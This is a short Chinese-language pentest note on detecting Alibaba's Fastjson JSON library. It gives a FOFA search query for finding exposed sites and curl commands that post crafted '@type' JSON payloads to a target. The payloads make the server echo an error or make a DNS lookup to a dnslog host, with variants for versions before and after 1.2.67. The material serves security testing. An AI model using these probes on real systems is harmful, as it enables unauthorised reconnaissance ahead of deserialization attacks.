Fastjson是阿里巴巴公司开源的一款JSON解析库,可用于将Java对象转换为其JSON表示形式,也可以用于将JSON字符串转换为等效的Java对象。
它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到极致,是目前Java语言中最快的JSON库。Fastjson接口简单易用,已经被广泛使用在缓存序列化、协议交互、Web输出、Android客户端等多种应用场景。
FOFA
app="Fastjson"如果站点有原始报错回显,可以用不闭合花括号的方式进行报错回显
curl http://192.168.2.133:32768/ -H "Content-Type: application/json" --data '{{"@type":"java.net.URL","val":"mx2guq.dnslog.cn"}:0'#payload
{"a":"
{{"@type":"java.net.URL","val":"dnslog"}:0#匹配特征
http.code=500 && "Internal Server Error" in body还可以通过DNS回显的方式检测后端是否使用Fastjson
curl http://x.x.x.x:8090/ -H "Content-Type: application/json" --data '{{"@type":"java.net.URL","val":"dnslog"}:0'1.2.67版本前
{"zeo":{"@type":"java.net.Inet4Address","val":"dnslog"}}1.2.67版本后payload
{"@type":"java.net.Inet4Address","val":"dnslog"}https://www.runoob.com/w3cnote/fastjson-intro.html
https://www.cnblogs.com/hei-zi/p/13274272.html